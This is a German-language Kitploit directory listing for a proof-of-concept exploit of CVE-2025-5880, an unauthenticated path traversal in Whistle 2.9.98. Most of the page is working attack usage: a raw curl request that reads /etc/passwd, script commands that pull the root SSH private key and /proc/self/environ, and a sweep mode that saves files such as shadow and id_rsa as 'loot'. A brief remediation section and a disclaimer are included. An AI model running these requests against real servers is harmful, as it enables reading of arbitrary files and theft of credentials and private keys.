Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-5880-PoC — Proof-of-Concept-Exploit für eine nicht authentifizierte Path-Traversal-Schwachstelle in Whistle v2.9.98. | Kitploit
Tools/GitHubGitHub/yacine-rm/cve-2025-5880-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & Bildung
GitHubyacine-rm/cve-2025-5880-poc

CVE-2025-5880-PoC

Proof-of-Concept-Exploit für eine nicht authentifizierte Path-Traversal-Schwachstelle in Whistle v2.9.98.

Repository anzeigen
1vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-5880 — Whistle 2.9.98 Path Traversal PoC

Python CVE CWE License

Proof-of-concept Exploit für eine nicht authentifizierte Path-Traversal-Schwachstelle in Whistle v2.9.98.


Schwachstellenübersicht

FeldDetail
CVE-IDCVE-2025-5880
CWECWE-22 (Path Traversal)
Betroffene SoftwareWhistle ≤ 2.9.98
Betroffener Endpunkt/cgi-bin/sessions/get-temp-file
AngriffsvektorNetzwerk — keine Authentifizierung erforderlich
AuswirkungBeliebiges Lesen von Dateien im Host-Dateisystem

Der Query-Parameter filename wird nicht bereinigt, bevor er zum Öffnen einer Datei auf der Festplatte verwendet wird. Dadurch kann ein Angreifer das vorgesehene Temp-Datei-Verzeichnis verlassen und jede Datei lesen, auf die der Whistle-Prozess Zugriff hat (z. B. /etc/passwd, /root/.ssh/id_rsa).


Schnellstart

root@kitploit:~
# Clone
git clone https://github.com/YourHandle/CVE-2025-5880
cd CVE-2025-5880

# No external dependencies
python3 CVE-2025-5880.py -u http://TARGET:8899 --preset passwd

Verwendung

root@kitploit:~
python3 CVE-2025-5880.py [-h] -u URL [-f FILE] [--preset PRESET]
                          [--sweep] [-o OUTPUT] [--save-dir DIR]
                          [--timeout N]

Beispiele

root@kitploit:~
# /etc/passwd lesen
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset passwd

# Root-SSH-Private-Key abgreifen
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset id_rsa -o id_rsa.pem

# Beliebigen Pfad lesen
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 -f /proc/self/environ

# Alle Presets durchlaufen und speichern
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --sweep --save-dir ./loot

Raw PoC (curl)

root@kitploit:~
# /etc/passwd
curl -s "http://TARGET:8899/cgi-bin/sessions/get-temp-file?filename=/etc/passwd" | jq -r '.value'

Behebung

Aktualisieren Sie Whistle auf eine Version, die den Parameter filename validiert und auf das vorgesehene Temp-Datei-Verzeichnis beschränkt. Wenden Sie serverseitig eine Whitelist-Pfadnormalisierung an (z. B. path.resolve + Präfix-Prüfung).


Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bereitgestellt.
Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.
Der Autor übernimmt keine Haftung für Missbrauch.

Tool herunterladen
FlagBeschreibung
-u / --urlBasis-URL des Ziels (z. B. http://192.168.1.10:8899)
-f / --fileBeliebiger Dateipfad zum Lesen
--presetBenannte Abkürzung: passwd shadow hosts id_rsa …
--sweepAlle Presets automatisch durchlaufen
-o / --outputErgebnis in Datei speichern
--save-dirVerzeichnis zum Ablegen der Beute aus --sweep
--timeoutHTTP-Timeout in Sekunden (Standard 10)